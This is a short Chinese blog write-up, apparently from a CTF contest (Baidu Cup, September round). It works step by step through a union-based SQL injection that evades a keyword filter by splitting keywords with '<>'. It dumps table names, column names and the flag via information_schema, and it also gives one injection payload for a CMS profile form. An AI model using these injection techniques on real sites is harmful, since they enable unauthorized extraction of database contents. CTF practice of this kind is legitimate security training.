百度杯九月场2

Author Avatar
Geroge Lee 10月 09, 2016
  • 在其它设备中阅读本文章

一、sql

1
2
3
4
5
6
php?id=1 un<>ion se<>lest 1,2,3
回显 flag{在数据库中}
2

第二个字段是可以显示的

1
2
3
4
5
6
http://57013df126fb4ca4b3280f842df66e1df71ea932206644c2.game.ichunqiu.com/index.php?id=1 un<>ion s<>elect 1,group_concat(table_name),3 from information_schema.tables where table_schema = database()
回显 flag{在数据库中}
info

表名 info

1
php?id=1 un<>ion s<>elect 1,gro<>up_con<>cat(column_name),3 from information_schema.columns where table_name = 0x696e666f

回显 405

需要加几个<>再次过滤

1
2
index.php?id=1 un<>ion s<>elect 1,gro<>up_con<>cat(co<>lumn_name),3 from in<>formation_schema.columns where table_name = 0x696e666f

回显

1
2
3
flag{在数据库中}
id,title,flAg_T5ZNdrm

字段名已经知道了,flAg_T5ZNdrm

1
index.php?id=1 un<>ion s<>elect 1,gro<>up_con<>cat(flAg_T5ZNdrm),3 from info

回显:flag{d3d59615-a0d4-4660-8b3e-8a5ba21c06ed},test

二、再见CMS

old_password=test11&truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select user())where uid =2 #

好难好难,做不出来了